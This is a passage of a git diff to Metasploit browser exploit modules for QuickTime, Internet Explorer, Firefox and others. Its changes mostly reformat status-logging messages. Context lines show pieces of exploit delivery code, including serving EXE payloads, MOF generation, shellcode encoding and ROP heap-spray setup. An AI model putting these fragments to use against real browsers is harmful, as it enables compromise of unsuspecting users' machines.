-485].pack('CV') if (request['User-Agent'] =~ /QuickTime/i or request.uri =~ /\.qtl$/) - print_status("Sending #{self.name} exploit to #{client.peerhost}:#{client.peerport}...") - print_status("Trying target #{target.name}...") + print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending exploit QTL file (target: #{target.name})") content = build_qtl(sploit) else - print_status("Sending #{self.name} init HTML to #{client.peerhost}:#{client.peerport}...") + print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending init HTML") shellcode = Rex::Text.to_unescape(p.encoded) url = ((datastore['SSL']) ? "https://" : "http://") diff --git a/modules/exploits/windows/browser/apple_quicktime_smil_debug.rb b/modules/exploits/windows/browser/apple_quicktime_smil_debug.rb index 548be718c2..0d25c9e5ff 100644 --- a/modules/exploits/windows/browser/apple_quicktime_smil_debug.rb +++ b/modules/exploits/windows/browser/apple_quicktime_smil_debug.rb @@ -78,8 +78,7 @@ class Metasploit3 < Msf::Exploit::Remote return if ((p = regenerate_payload(client)) == nil) if (request['User-Agent'] =~ /QuickTime/i or request.uri =~ /\.smil$/) - print_status("Sending #{self.name} exploit to #{client.peerhost}:#{client.peerport}...") - print_status("Trying target #{target.name}...") + print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending exploit SMIL (target: #{target.name})") # This is all basically filler on the browser target because we can't # expect the SEH to be in a reliable place across multiple browsers. @@ -119,7 +118,7 @@ class Metasploit3 < Msf::Exploit::Remote send_response(client, smil, { 'Content-Type' => "application/smil" }) else - print_status("Sending #{self.name} init HTML to #{client.peerhost}:#{client.peerport}...") + print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending init HTML") shellcode = Rex::Text.to_unescape(p.encoded) url = ((datastore['SSL']) ? "https://" : "http://") diff --git a/modules/exploits/windows/browser/blackice_downloadimagefileurl.rb b/modules/exploits/windows/browser/blackice_downloadimagefileurl.rb index 4604118c40..00eaf6b11a 100644 --- a/modules/exploits/windows/browser/blackice_downloadimagefileurl.rb +++ b/modules/exploits/windows/browser/blackice_downloadimagefileurl.rb @@ -85,14 +85,14 @@ class Metasploit3 < Msf::Exploit::Remote def on_request_uri(cli, request) if request.uri.match(/\.EXE/) - print_status("Sending EXE payload to #{cli.peerhost}:#{cli.peerport}...") + print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending EXE payload...") send_response(cli, @payload, { 'Content-Type' => 'application/octet-stream' }) return elsif request.uri.match(/\.MOF/) return if @mof_name == nil or @payload_name == nil - print_status("Generating mof...") + print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Generating mof") mof = generate_mof(@mof_name, @payload_name) - print_status("Sending MOF to #{cli.peerhost}:#{cli.peerport}...") + print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending MOF...") send_response(cli, mof, {'Content-Type'=>'application/octet-stream'}) return end @@ -137,7 +137,7 @@ class Metasploit3 < Msf::Exploit::Remote #Clear the extra tabs content = content.gsub(/^\t\t/, '') - print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...") + print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending exploit HTML") send_response_html(cli, content) handler(cli) diff --git a/modules/exploits/windows/browser/ie_createobject.rb b/modules/exploits/windows/browser/ie_createobject.rb index 7075fadeaf..eec9dc7ad0 100644 --- a/modules/exploits/windows/browser/ie_createobject.rb +++ b/modules/exploits/windows/browser/ie_createobject.rb @@ -126,7 +126,7 @@ class Metasploit3 < Msf::Exploit::Remote if (request.uri.match(/payload/)) return if ((p = regenerate_payload(cli)) == nil) data = generate_payload_exe({ :code => p.encoded }) - print_status("Sending EXE payload to #{cli.peerhost}:#{cli.peerport}...") + print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending EXE payload") send_response(cli, data, { 'Content-Type' => 'application/octet-stream' }) return end @@ -260,7 +260,8 @@ function #{var_func_exploit}( ) { content = Rex::Text.randomize_space(content) - print_status("Sending #{self.name} exploit HTML to #{cli.peerhost}:#{cli.peerport}...") + print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending exploit HTML...") + # Transmit the response to the client send_response_html(cli, content) diff --git a/modules/exploits/windows/browser/mozilla_interleaved_write.rb b/modules/exploits/windows/browser/mozilla_interleaved_write.rb index 283cb9a17d..f3396c7b5a 100644 --- a/modules/exploits/windows/browser/mozilla_interleaved_write.rb +++ b/modules/exploits/windows/browser/mozilla_interleaved_write.rb @@ -90,7 +90,7 @@ class Metasploit3 < Msf::Exploit::Remote # Re-generate the payload return if ((p = regenerate_payload(cli)) == nil) - print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...") + print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending exploit HTML...") send_response_html(cli, generate_html(p), { 'Content-Type' => 'text/html' }) # Handle the payload diff --git a/modules/exploits/windows/browser/mozilla_mchannel.rb b/modules/exploits/windows/browser/mozilla_mchannel.rb index 57b6b7c1f9..8a56601754 100644 --- a/modules/exploits/windows/browser/mozilla_mchannel.rb +++ b/modules/exploits/windows/browser/mozilla_mchannel.rb @@ -128,7 +128,7 @@ class Metasploit3 < Msf::Exploit::Remote # check for non vulnerable targets if agent !~ /NT 5\.1/ or agent !~ /NT 6\.1/ and agent !~ /Firefox\/3\.6\.16/ - vprint_error("Target not supported: #{agent}") + vprint_error("#{cli.peerhost.ljust(16)} #{self.shortname} Target not supported: #{agent}") send_not_found(cli) return end @@ -346,7 +346,7 @@ class Metasploit3 < Msf::Exploit::Remote #Remove the extra tabs html = html.gsub(/^\t\t/, '') - print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...") + print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending HTML...") send_response_html(cli, html, { 'Content-Type' => 'text/html' }) # Handle the payload diff --git a/modules/exploits/windows/browser/mozilla_nstreerange.rb b/modules/exploits/windows/browser/mozilla_nstreerange.rb index 0f2be4a53b..58732ec065 100644 --- a/modules/exploits/windows/browser/mozilla_nstreerange.rb +++ b/modules/exploits/windows/browser/mozilla_nstreerange.rb @@ -222,7 +222,7 @@ class Metasploit3 < Msf::Exploit::Remote def on_request_uri(cli, request) if request.uri == get_resource() or request.uri =~ /\/$/ - print_status("#{self.refname}: Redirecting #{cli.peerhost}:#{cli.peerport}") + print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Redirecting to .html URL") redir = get_resource() redir << '/' if redir[-1,1] != '/' redir << rand_text_alphanumeric(4+rand(4)) @@ -230,7 +230,7 @@ class Metasploit3 < Msf::Exploit::Remote send_redirect(cli, redir) elsif request.uri =~ /\.html?$/ - print_status("#{self.refname}: Sending HTML to #{cli.peerhost}:#{cli.peerport}") + print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending HTML") xul_name = rand_text_alpha(rand(100)+1) j_applet = rand_text_alpha(rand(100)+1) @@ -243,7 +243,7 @@ EOS send_response(cli, html, { 'Content-Type' => 'text/html' }) elsif request.uri =~ /\.xul$/ - print_status("#{self.refname}: Sending XUL to #{cli.peerhost}:#{cli.peerport}") + print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending XUL") js_file = rand_text_alpha(rand(100)+1) @js_func = rand_text_alpha(rand(32)+1) @@ -267,7 +267,7 @@ EOS send_response(cli, xul, { 'Content-Type' => 'application/vnd.mozilla.xul+xml' }) elsif request.uri =~ /\.js$/ - print_status("#{self.refname}: Sending JS to #{cli.peerhost}:#{cli.peerport}") + print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending JS") return if ((p = regenerate_payload(cli).encoded) == nil) base_offset = (datastore['Crash'] != true) ? datastore['BaseOffset'] : 1 diff --git a/modules/exploits/windows/browser/ms03_020_ie_objecttype.rb b/modules/exploits/windows/browser/ms03_020_ie_objecttype.rb index 2f1783e827..0c7443973e 100644 --- a/modules/exploits/windows/browser/ms03_020_ie_objecttype.rb +++ b/modules/exploits/windows/browser/ms03_020_ie_objecttype.rb @@ -85,7 +85,7 @@ class Metasploit3 < Msf::Exploit::Remote when /Windows NT/ ret = target['Rets'][0] else - print_status("Sending 404 to user agent: #{request['User-Agent']}") + print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending 404 to user agent: #{request['User-Agent']}") cli.send_response(create_response(404, 'File not found')) return end @@ -111,7 +111,7 @@ class Metasploit3 < Msf::Exploit::Remote "" + "" - print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...") + print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending exploit HTML") # Transmit the response to the client send_response_html(cli, content) diff --git a/modules/exploits/windows/browser/ms10_018_ie_behaviors.rb b/modules/exploits/windows/browser/ms10_018_ie_behaviors.rb index 4a4c3ba5c3..814be4cc6f 100644 --- a/modules/exploits/windows/browser/ms10_018_ie_behaviors.rb +++ b/modules/exploits/windows/browser/ms10_018_ie_behaviors.rb @@ -128,7 +128,6 @@ class Metasploit3 < Msf::Exploit::Remote mytarget = nil agent = request.headers['User-Agent'] - #print_status("Checking user agent: #{agent}") if agent =~ /Windows NT 6\.0/ mytarget = targets[2] # IE7 on Vista elsif agent =~ /MSIE 7\.0/ @@ -136,7 +135,7 @@ class Metasploit3 < Msf::Exploit::Remote elsif agent =~ /MSIE 6\.0/ mytarget = targets[1] # IE6 on NT, 2000, XP and 2003 else - print_error("Unknown User-Agent #{agent} from #{cli.peerhost}:#{cli.peerport}") + print_error("#{cli.peerhost.ljust(16)} #{self.shortname} Unknown User-Agent #{agent}") end mytarget @@ -158,7 +157,7 @@ class Metasploit3 < Msf::Exploit::Remote # Re-generate the payload return if ((p = regenerate_payload(cli)) == nil) - print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport} (target: #{mytarget.name})...") + print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending #{self.name} (target: #{mytarget.name})...") # Encode the shellcode shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(mytarget.arch)) diff --git a/modules/exploits/windows/browser/ms11_003_ie_css_import.rb b/modules/exploits/windows/browser/ms11_003_ie_css_import.rb index 8d7c91af6a..f50b8ea4bb 100644 --- a/modules/exploits/windows/browser/ms11_003_ie_css_import.rb +++ b/modules/exploits/windows/browser/ms11_003_ie_css_import.rb @@ -153,7 +153,6 @@ class Metasploit3 < Msf::Exploit::Remote mytarget = nil agent = request.headers['User-Agent'] - #print_status("Checking user agent: #{agent}") if agent =~ /MSIE 6\.0/ mytarget = targets[3] elsif agent =~ /MSIE 7\.0/ diff --git a/modules/exploits/windows/browser/winzip_fileview.rb b/modules/exploits/windows/browser/winzip_fileview.rb index 6490ad234f..f59f95fcb1 100644 --- a/modules/exploits/windows/browser/winzip_fileview.rb +++ b/modules/exploits/windows/browser/winzip_fileview.rb @@ -120,7 +120,7 @@ class Metasploit3 < Msf::Exploit::Remote | - print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...") + print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending exploit HTML...") # Transmit the response to the client send_response_html(cli, content) diff --git a/modules/exploits/windows/browser/wmi_admintools.rb b/modules/exploits/windows/browser/wmi_admintools.rb index 47bfbd6917..80c6bbb786 100644 --- a/modules/exploits/windows/browser/wmi_admintools.rb +++ b/modules/exploits/windows/browser/wmi_admintools.rb @@ -91,11 +91,10 @@ class Metasploit3 < Msf::Exploit::Remote mytarget = nil agent = request.headers['User-Agent'] - #print_status("Checking user agent: #{agent}") if agent =~ /MSIE 6\.0/ or agent =~ /MSIE 7\.0/ or agent =~ /MSIE 8\.0/ mytarget = targets[1] else - print_error("Unknown User-Agent #{agent} from #{cli.peerhost}:#{cli.peerport}") + print_error("#{cli.peerhost.ljust(16)} #{self.shortname} Unknown User-Agent #{agent}") end mytarget end @@ -112,7 +111,7 @@ class Metasploit3 < Msf::Exploit::Remote end if request.uri == get_resource() or request.uri =~ /\/$/ - print_status("Sending #{self.refname} redirect to #{cli.peerhost}:#{cli.peerport} (target: #{mytarget.name})...") + print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending redirect (target: #{mytarget.name})...") redir = get_resource() redir << '/' if redir[-1,1] != '/' @@ -124,7 +123,7 @@ class Metasploit3 < Msf::Exploit::Remote # Re-generate the payload return if ((p = regenerate_payload(cli)) == nil) - print_status("Sending #{self.refname} HTML to #{cli.peerhost}:#{cli.peerport} (target: #{mytarget.name})...") + print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending HTML (target: #{mytarget.name})...") # Generate the ROP payload buf_addr = mytarget['SprayTarget'] @@ -206,7 +205,7 @@ EOS send_response_html(cli, content) elsif request.uri =~ /\.dll$/ - print_status("Sending #{self.refname} DLL to #{cli.peerhost}:#{cli.peerport} (target: #{mytarget.name})...") + print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending DLL (target: #{mytarget.name})...") # Generate a .NET v2.0 DLL, note that it doesn't really matter what this contains since we don't actually # use it's contents ...